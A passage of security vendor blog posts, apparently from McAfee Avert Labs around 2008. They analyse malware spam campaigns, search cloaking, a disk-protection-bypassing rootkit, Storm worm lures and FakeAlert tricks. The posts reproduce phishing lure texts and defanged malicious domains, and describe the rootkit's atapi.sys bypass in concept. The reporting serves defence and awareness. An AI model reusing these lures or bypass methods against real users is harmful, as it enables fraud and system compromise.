Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
[name]
[airline]

Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon).
—————————–

As with previous campaigns, the executable is a new variant of Spy-Agent.bw.  Once again, Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

On July 15, we sent out a Security Advisory including Generic Downloader.ab (MTIS08-131-A).  This covered a Trojan variant that was mass spammed, purporting to be a UPS invoice.  Since then we’ve seen a number of subsequent mass spammings carrying new variants of Spy-Agent.bw, The email message content is similar to the original spam:

———————————-
From: “United Parcel Service”
Subject: [RE] UPS Tracking Number [number]
Body:

Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your UPS

Attachment: UPS_INVOICE_[number].zip or invoice_[number].zip
———————————-

Over the past 24 hours we’ve seen other spam runs from “Customs Service” with the attachment “Tax_invoice.zip” as well as “Bill_Tax.zip” attachments from “US Customs Service” and “Rechnung.zip” from “WG: Lastschrift [number]“.  The zip attachments contain .EXE files.  In order for infection to occur users must open the attached ZIP and then choose to run the executables manually.

Product coverage is being updated for new malware variants as necessary and a follow-up security advisory will be sent soon.

These spam runs may continue over the next few days.  Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

Last week, a friend, working at the French CERT-IST, alerted me to some web sites that, although they have direct access or a logon via a Google search, did not display the same result in spite of a unique visible URL. Let me explain…..

In the first case, we arrive on the normal (or official) page, but when surfed to via a Google search, we arrive at a false blog page proposing alternative and even malicious choices and links. This technique is commonly called cloaking. Its goal is to modify the content of a webpage depending on visitor parameters or browser history.

Let’s me first give you an example. Using IE, I enter in the address bar an attacked URL. I directly reach the site:

Using Google, I search for the same site:

I then follow the link and…. Surprise! I arrive on a fake blog page named for the site I searched however it is not the expected one; it is a rogue advertising page.

If I wait on the page and do not browse any proposed link for a few minutes, the normal web page is then displayed in place of the fake one. But if I chose any of these links, I am taken to some very suspicious advertising sites.

To achieve this deception, the main page contains a mere instruction line that launches a malicious javascript, with a long unescape sequence.

When decoded (today, for this job, I used facilities offered at
http://scriptasylum.com/tutorials/encdec/encode-decode.html), I discovered the link to reach the others “recipes” of this attack in an obscure subdirectory.

Using Google, I found this file architecture was not unique. Today more than 80 sites are affected by this attack, luckily these malicious files are detected by McAfee as Exploit-PHPBB.b

It seems this attack benefits people being paid through “pay per click” and/or people behind some rogue software like fake anti-viruses or naughty encounters. For sure, it is a profitable business!!

As early as 2006 the IP addresses revealed by Fiddler were pointed as suspicious. Two years after, they are still alive and still hosted at Global Net Access, LLC and ISPrime Inc, two American companies.

Various URLs visible in the Fiddler web session contain affiliate IDs. Calls at findwhat.com makes one think that the MIVA pay-per-click search engine company is the one involved in this story. As each new page loads, this server records the affiliate ID. This makes it possible for him (the affiliate) to get paid for each click. Consequently, it should it easy to unmask it! 

At this point we can say that nobody seems in a hurry to stop this cloaking party. It looks like many people do well out of it! 

Recently, a piece of malware named MachineDog attracted attention within the China security community. The malware itself appears to be a well designed tiny rootkit, and is quite different from other malware. One special characteristic of this malware is that it’s designed to penetrate the hard disk as well as security software, which are installed in most internet bars and cafes. This means it can infect most machines in many internet bars and cafes, in some cases without too much resistance.

The malware is composed of a user-mode application part and a kernel driver part. The application part does limited work, which includes extracting the driver and installing it as service, then communicating with the driver by io control. The earlier version of the application part does the infection work by sending IRPs into lower disk driver device(\Device\Harddisk\DR0) to locate and write userinit.exe onto the hard disk directly. In later versions, the infection works are improved and moved into the driver itself, leaving the application part tiny and simple.

The driver does the most important work. It does the infection which was implemented earlier in the application part. Its infection method is quite special and interesting, which can bypass and penetrate many hard disk protection software, and some security software. First it reads the atapi.sys driver file  from the hard disk then searches dispatch routine addresses in that driver’s body, to bypass any existing dispatch routine that have inline hooks. Why choose atapi.sys? Because the device created in atapi.sys is the last device in all the device stacks that the IRP passes through, and it’s the end of this IRP. Sending IRPs to this device can avoid all filter devices and inline hooks in any upper device which are used by some security software or protection software. Then the malware sends IRPs to the partition device dispatch routines in atatpi driver to read and write data directly into hard disk. It first reads data to locate which sector userinit.exe is resident in so it knows where to infect. It then writes the inject codes into the hard disk by that way and will att that point modify userinit.exe. At last it will remove inline hook of atapi devices if they’ve been inline hooked until it receives the close command from application part.

Most internet bars and cafes rely on hard disk protection software excessively, and mistakenly believe these types of software can replace security software. Once their machines are infected, the administrator just restores from backups made by the protection software. This malware takes advantage of this contrived neglect. The attack is so dangerous that once it successfully loads its driver into the kernel, most hard disk protection software will be nothing but an empty shuck, with the administrator still having no idea!!!

McAfee customers are protected from the threat by DAT 5337.

Reference:

http://article.pchome.net/content-515951.html

http://tech.ccidnet.com/art/1099/20080709/1501723_1.html

http://www.xj.xinhuanet.com/2008-06/20/content_13599327.htm

Just when you were wondering what the Storm worm authors could come up with next after using 4th of July theme as bait for their last spam run, Nuwar has now resorted to a war theme. The authors have cleverly chosen to exploit the escalating political tensions in the Middle East between Iran and the United States over Iran’s threat to attack Israel in response to any military action on its nuclear facilities. Some of the subjects observed in today’s spam are:

The beginning of The World War III
US Army crossed Iran’s borders
US Army invaded Iran
US soldiers occupied Iran
USA attacked Iran
USA declares war on Iran
USA unleashed war on Iran
War between USA & Iran

This is not the first time Nuwar has used a war theme. Incidentally, McAfee christened the Storm worm as “Nuwar” because it used the sensational war theme “Nuclear WAR in USA!” when it first appeared. Since then the authors of Nuwar have used and re-used morbid and shocking themes religiously with every new spam run. These themes sometimes get repeated when that time of the year approaches and this one is no different. War themes have been seen in previous Storm worm campaigns dating back to Nov 2006 & Apr 2007.

Unsuspecting users who follow the link in the spammed email are directed to a Storm bait page hosting a video that purportedly shows the first minutes of the beginning of World War III. Except that clicking the video would download “iran_occupation.exe”. And in case a user wanted to know about the advertised Patriots and Veterans Programs they would end up downloading “Form.exe”.  Both files are detected as W32/Nuwar@MM with McAfee’s latest beta dats.

The Storm bait pages are currently being hosted on the following fast-flux domains.

dailydotnews[.]com
dotdailynews[.]com
morenewsonline[.]com
newsworldnow[.]com
statenewsworld[.]com

The above mentioned domain names have be sanitized in the blog and readers are strongly advised not to attempt to visit them as they host a cocktail of exploits that attempt to infect a visiting machine. This information is being provided for administrators to take pro-active measures and block access to the rouge domains.

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’:

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants experiences, go here
and make sure you download the ‘Global Spam Diaries’ as well.

While reading my colleague François Paget’s recent blog about detection numbers, I noticed that something about the graph illustrating the growth of the collection maintained by AV-Test.org seemed a bit odd.

The last few months showed a bigger total size than indicated by the forecast line, which is an exponential function. By looking more closely at the statistics of monthly growth we can see why:

During the last couple of months there is no longer an increase in the number of new samples added. The growth is no longer exponential but linear, averaging around 600,000 samples added each month. Looking at our own numbers of new samples, I can confirm this new linear growth.

Why is this a big deal? For years the security industry has been fighting an uphill battle–with the number of new samples increasing every month at an alarming rate. Now with constant, though still massive, growth there is some light at the end of the tunnel. If this trend keeps up, planning for future resources and technologies will become much easier and more manageable.

I’ll add one more remark about counting by “unique samples,” in which unique means the file has got a cryptographic hash different from all other files in the collection: For the time being this is one useful way of counting, but it can’t be mapped to detection numbers (François explained why) and it works today only because most new samples are Trojans. Should we see more file-infecting viruses in the future, and there are some indications they will make a comeback, this way of counting will quickly become useless.

There mustn’t be much going on in the world today as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high volume spam campaign is using some wacky subjects to lure people into clicking on the links:

Subject: Britney found hanged in locker room
Subject: White House hit by lightning, catches fire
Subject: Oprah found sleeping the streets
Subject: Eiffel Tower damaged by massive earthquake
Subject: Donald Trump missing, feared kidnapped
Subject: Lastest! Obama quits presidential race

This clever social engineering technique plays on peoples inquisitiveness in news of natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

All the links go to a fake pornotube page hosted on legitimate sites that have been hacked. If you click on the video (that’s actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM and the spam is also currently detected with our Anti-Spam products.

So it goes without saying.. NEVER click on links in an email unless you are sure of its origin, keep your Anti-Virus software up-to-date and if you have a website make sure its properly secured so you’re not hosting stuff like this.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

This week in Paris, a friend asked me how the anti-virus situation was going and how we will be able to face up to the unexpected increase in malware number. “In a day, one of your competitors announces more than 1.7 million new detections. Its total detection jumped from 74,000 to 1,800,000! If this keep this up, the level of 2 million viruses will be overtook rapidly”, he said. Humorously, the man I was talking to concluded: “and you [McAfee], you still detect less than 400,000 threats?”

Counting malware can be quite a tricky business. At McAfee, and with each anti-virus definitions for VirusScan, we announce how many threats we are detecting with each new DAT release. This figure, however, is a *family* count. Yesterday (June 17th, 2008), the clock said 407125.

In September 2004 with DAT release 4391we reached 100,000 threats detected. With the 4800 release on May 2006 the number of threats detected reached 200,104 detections. This figure doubled in 2 years, and the situation could be analyzed as follow:

To explain how it was possible to pass from 74,000 to 400,000 or to 1,800,000 malware, I informed my friend we had to take into consideration AV researchers “zoos” - in other words: “collections” – consisting of several million malware samples (sometimes we use the term “unique samples”) collected each day.  I explained to him we had, roughly, in our high-security servers, 10,000,000 files:

• classified by family
• often with a vast number of variants
• sometimes with multiple infected files from a single malware variant (when it is parasitic or polymorphic), or when malware authors configure their threats to serve a binary-unique version with each download. In that case, some zoos contain 1 or 2 *versions* while others will have 10,000 and others still 100,000!!
• without forgetting the terrific “miscellaneous” subfolder for files that we cannot pigeonhole

Of course, I said almost all were detected and consequently all these prediction numbers were not gospel truth. I added they were only useful to establish a long-term trend on condition that their computation complies with a single rule as time goes by.

To end my demonstration I searched for real figures. Firstly I fell on AV-test.org statistics. On their site, they explain they manage 60 terabytes of testing data, including several million malware samples and clean files. They tests malware on all important desktop and server platforms, including all currently supported versions of Windows, Linux, Solaris, Unix, Lotus Domino/Notes and MS Exchange. Having just recently received from Germany some figures summarizing their malware collection items, I precisely heard of the size of their collection which exceeded 11 million unique samples (11,002,741 in April 2008).

Strengthened by this number, I was pretty sure we had - at McAfee - the same volume including parasitic and polymorphic malware for which we had to own multiple samples. I asked for a confirmation and received some figures I entered in this other chart:

While I wrote this blog entry, I imagined the reader surprise: in 3 months (from January 31 to April 30) collections increased by 2,880,000 million samples (at McAfee) and by 1,700,000 million samples (at AV-test.org); an average of 760,000 new files each month… This is true, and it is why we constantly work on new technologies to answer this challenge.

To conclude this blog entry, I propose to you the following……. It demonstrates that it is possible to announce that we detected, at the end of 2007, “between 357,820 (DAT-5196) and 8,600,000 pieces of malware”. And I predict we will detect at the end of 2008 between 450,000 and 22,000,000 malware”. OK, I joke a bit, but I also want to demonstrate there are many manners to count malware and you must not judge a product only by the announced number of detections.

In one of my previous blog posts, I did write about FakeAlert-AG’s fear strategy, that consisted of changing the desktop background, and dropping the legitimate “bugs” screensaver. Well, we’ve seen that in newer variants of this threat the authors of this threat kept the same strategy, but they did change the screensaver to one that is way more scary for computer users…

Yes, you guessed right, the BlueScreen screensaver!!!

As in the previous case, the screensaver chosen by the author(s) of this threat is a legitimate application, this time coming from SysInternals, a company well known for its active contributions to the security community. However, the effect of such a screensaver is such that we’re afraid that it may have tricked several users.

Logging off,

Paolo

We had a customer a while back report a false detection on one of our Foundstone checks. The purpose of the check wasn’t even to detect malware, it was to detect the presence of a certain legitimate remote administration tool. The customer insisted they were not running that administration server on the host. From the diagnostic packet captures they sent in, however, there was no denying that the tool was running on that host whether they knew it or not. And that tool happens to be commonly dropped by malware to serve as its backdoor. No doubt, some damage had already been done by the time they reported this to us, but how much more damage was prevented when this security breach was discovered because of our check?

Malware detection is not one of the most prominent functions of a remote vulnerability scanner. But most major scanners do offer this capability. Don’t expect to replace your traditional AV with vulnerability scanners any time in the future, though.

Although vulnerability scanners can open and read files, they are mostly agentless; so they are reduced to making RPC calls to perform these operations. If you were to mimic the signature scanning of traditional AV, performance would be unacceptably poor. And so malware checks have to resort to detecting only the presence of malware. That is, detecting its traces. This can be the existence of certain files (no opening or reading), registry keys, or a running service. In most cases, having two out of three of these traces is a unique enough combination for a strong detection.

Another way to detect the presence of malware with a vulnerability scanner is to detect the network activity of the malware. If it opens a backdoor on a particular port and listens for commands, which is the majority of malware today, most likely we can detect it remotely. In this respect, the vulnerability scanner actually has an advantage over traditional host-based AV. Take the case of a rootkit that can hide its files, registry entries, running process, service, etc.–it’s virtually invisible on the host. It might even hide its network activity, but it can hide it only from programs running on the local machine. Sophisticated as the rootkit may be, it cannot hide its network activity from the vulnerability scanner working remotely.

In the end, detecting malware with a vulnerability scanner is purely reactive, that is, you are raising a flag after the malware has already installed itself–whereas traditional AV has the noble goal of preventing it from even getting onto the host.

Some might consider the malware detection offering of vulnerability scanners as superfluous because of the limited capability and its reactive nature. But I’m sure that the customer with the hidden remote administration tool isn’t one of them.

Last night our researchers identified similarities between the recent Adobe Flash exploits and a known (patched) vulnerability: CVE-2007-0071. At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.

The exploits that we have captured from the field do not appear to exploit the latest version of Flash. We continue to hunt for missing 9,0,124 exploits and will post an update should one be discovered. In the meantime, it’s best to update to the latest player, if you haven’t yet done so.

Yesterday, when analyzing a variant of a FakeAlert trojan, I saw something funny, a confirmation that when analyzing malware it is rather common to stumble across interesting stuff

So, we received a file named 4nlSkgZm.exe, which of course is a really dodgy filename, but we’ll pretend we didn’t notice . When I tried to run this file on my goat machine, it of course started installing itself and displaying the usual “you are infected” popups, but it also decided to be even more clear in telling me I was infected:

What happened? Well, nothing too fancy: the malware replaced my existing background with a dropped image, and then set my current screensaver to “blackster.scr” that was dropped too. It is interesting to note that the “blackster.scr” is a legitimate screensaver, and we are sure that the original author would never even imagine that his funny creation could be used like this!

All in all a rather effective method of scaring the victims of this threat

I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan the last two days. It was encouraging to see many members from not only academics, security vendors, and anti-phishing groups but also many law enforcement agencies including Interpol, Kyoto Prefacture Police amongst others. There were also several presentators from the Online Gaming community.

Having such a diverse turn-out certainly helps push the greater awareness of a multinude of cyber crime issues. It was very encouraging to see everyone are agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting the users. There was also the video crew from NHK, to bring the CeCOS message across to Japanese TV viewers.

Dr. Uchida-san from The Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle of the issue, from the psychological and educational aspects. Both of which compliment the policy and technology countermeasures.

Shinsuke Honjo and I gave a presentation on Monday to highlight on how malware authors are now going all out to attack on victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting for us to have our research corroborated with data from other speakers at the event. Terence Park, researcher from KrCERT/CC, in particularly demonstrated how a Korean document viewer was used as a bait, to install a password stealer. This was another classic example of how malware authors, can be using different localized techniques to get their victims.

Overall, the message that seems to be very consistent throughout are - co-operation and education. In tackling a global issue like cyber crime, these are both important factors not only in tracking and prosecuting the criminals, but also in better protecting Internet businesses and users.

Here’s a quick update to the earlier post on a new unpatched Adobe Flash vulnerability.  Through looking for sites serving these SWF exploits we’ve found a connection with recent mass hacks.  Hacked sites reference an external script, just as they have for quite some time.  But, the external scripts now reference an SWF file.  This SWF file references another SWF file named: WIN%209,0,124,0i.swf (WIN 9,0,124,0i.swf), which seems to be off-line.  While we can not confirm this last SWF file attempts to exploit this new vulnerability, Symantec mentioned the same domain serving the exploit earlier.  SANS also mentions another domain, and 2 presumed exploits, named WIN%206,0,79,0ff.swf (WIN 6,0,79,0ff.swf), and WIN%206,0,79,0ie.swf (WIN 6,0,79,0ie.swf) also off-line.  These file names suggest 3 things.

1) Different exploits are crafted to exploit different versions of Adobe Flash, in this case 9,0,124,0 and 6,0,79,0.
2) Versions of the exploit may also exist, or be under development, to target other operating systems, as the aforementioned file names begin with WIN.
3) Exploits exist for both Internet Explorer and Firefox, as the file names end in “i”, “ie”, or “ff”

Thus far we’ve identified 2 particular domains involved in mass hacks that are also believed to have served these Flash exploits.  Combined, Google yields approximately 250,000 page results when searching for those references (ie. compromised sites that link to scripts that link to flash exploits).

Again this threat is still under analysis, more details to follow.

When analyzing malware, it is not uncommon to stumble across interesting situations. Recently, I have been analyzing a variant of a FakeAlert BHO. This threat isn’t notable; it displays “alert” pop-ups when correctly installed, and prompts users to download a fake anti-spyware product.

However, when analyzing it, I noticed that this BHO was trying to access a file named “f***youspilberg.bat” located in the root folder of my research machine. Of course, with such a name, I immediately got interested and started to dig deeper to see what was going on.

After removing the inevitable compression layer, I was quickly able to locate the file access operation inside the FakeAlert’s code; specifically, it resides inside the DllRegisterServer export function, which is used to initialize BHOs.

After analyzing the code, I saw that the routine which contains the file access operation will perform checks on the existence of this file and the file creation date, returning TRUE if the checks are OK or FALSE otherwise. This again increased my curiosity.

So, I resumed analyzing the code that follows the invocation of the routine which performs the check on the f***youspilberg.bat file:

We can see now that if the checks on the file are succesful, the next block of code will be bypassed. What is that block of code? Why do we want to bypass it? After looking further, I found that block just checks for the presence of VMWare. If VMWare is detected, then no other operation occurs and the FakeAlert silently exits.

Glueing this all together, our code becomes:

Now we have all the pieces. If the f***youspilberg.bat file is found, then the anti-VMware check is skipped. Otherwise, we need to verify that we are not running inside a VMware box. The VMware check is performed to prevent analysis in a safe environment, but why bypass such a check if the f***youspilberg.bat is present?

We can only guess. It is probable that the authors of this FakeAlert needed to test their creation, and they have probably decided to use VMware for their testing. By placing f***youspilberg.bat in the root of their VMware image, they could do the testing without being caught by their protection mechanism.

But the real question is, What did “Mr. Spilberg” do to the authors of this malware to arouse such antagonism? Maybe they don’t like the return of Indiana Jones? Or are they scared of E.T.?